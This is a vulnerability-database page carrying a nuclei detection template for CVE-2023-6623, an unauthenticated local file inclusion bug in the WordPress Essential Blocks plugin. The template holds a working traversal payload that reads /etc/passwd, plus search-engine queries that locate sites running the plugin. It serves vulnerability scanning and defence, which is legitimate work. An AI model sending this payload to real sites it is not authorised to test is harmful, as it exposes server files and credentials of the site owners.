Lucene search
K

Essential Blocks < 4.4.3 - Local File Inclusion

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

Wordpress Essential Blocks < 4.4.3 - LFI vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6623
15 Jan 202417:27
circl
CNNVD
WordPress Plugin Essential Blocks Security Vulnerability
15 Jan 202400:00
cnnvd
CVE
CVE-2023-6623
15 Jan 202415:10
cve
Cvelist
CVE-2023-6623 Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion
15 Jan 202415:10
cvelist
NVD
CVE-2023-6623
15 Jan 202416:15
nvd
OSV
CVE-2023-6623
15 Jan 202416:15
osv
Patchstack
WordPress Essential Blocks plugin < 4.4.3 - Unauthenticated Local File Inclusion vulnerability
6 Feb 202606:17
patchstack
Prion
Design/Logic Flaw
15 Jan 202416:15
prion
Positive Technologies
PT-2023-32722 · WordPress · Essential Blocks
23 Dec 202300:00
ptsecurity
RedhatCVE
CVE-2023-6623
23 May 202504:57
redhatcve
Rows per page
id: CVE-2023-6623

info:
  name: Essential Blocks < 4.4.3 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch,coldfish
  severity: critical
  description: |
    Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
  reference:
    - https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
    - https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6623
    cwe-id: CWE-22
    epss-score: 0.50673
    epss-percentile: 0.98782
    cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpdeveloper
    product: essential_blocks
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/essential-blocks/
    fofa-query: body=/wp-content/plugins/essential-blocks/
    publicwww-query: "/wp-content/plugins/essential-blocks/"
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
      - '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body_1)"
          - 'contains(body_2, "Essential Blocks – Page")'
        condition: and
# digest: 4a0a00473045022075eef36ef7a9c3be4e4364a0b5cb3b34506481c89a79d073f0fa15f75f9f243d0221009a07d6d9a8b67783ebcf699e2c26def55b2ad1c59bcb72486235c4c31ca7432f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation